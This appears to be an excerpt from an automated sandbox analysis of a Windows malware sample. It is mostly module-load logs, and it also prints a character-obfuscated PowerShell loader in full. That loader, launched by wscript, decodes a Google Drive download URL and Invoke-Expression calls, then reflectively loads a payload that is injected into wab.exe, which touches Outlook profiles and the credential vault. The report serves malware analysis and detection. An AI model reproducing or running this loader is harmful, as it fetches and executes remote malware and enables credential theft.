Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1999089456.0000000007459000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1991407968.0000000002D38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2004519989.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdbF source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb#j source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: newfile.exe

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=", "0")
Source: Yara match File source: 00000004.00000002.2006759213.000000000B869000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1995366811.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Magera116)$global:reboundingness = [System.Text.Encoding]::ASCII.GetString($Preconjecturing)$global:jamboretten=$reboundingness.substring(347067,28673)<#Reprehensive Tunnelman Geoduc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Egnsteaters $Polyplectron $Nongratifying), (Statsministrenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kimms = [AppDomain]::CurrentDomain.GetAssembli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Raggety)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Nedbrsmngde, $false).DefineType($Byportens, $Ganz
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Magera116)$global:reboundingness = [System.Text.Encoding]::ASCII.GetString($Preconjecturing)$global:jamboretten=$reboundingness.substring(347067,28673)<#Reprehensive Tunnelman Geoduc
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc 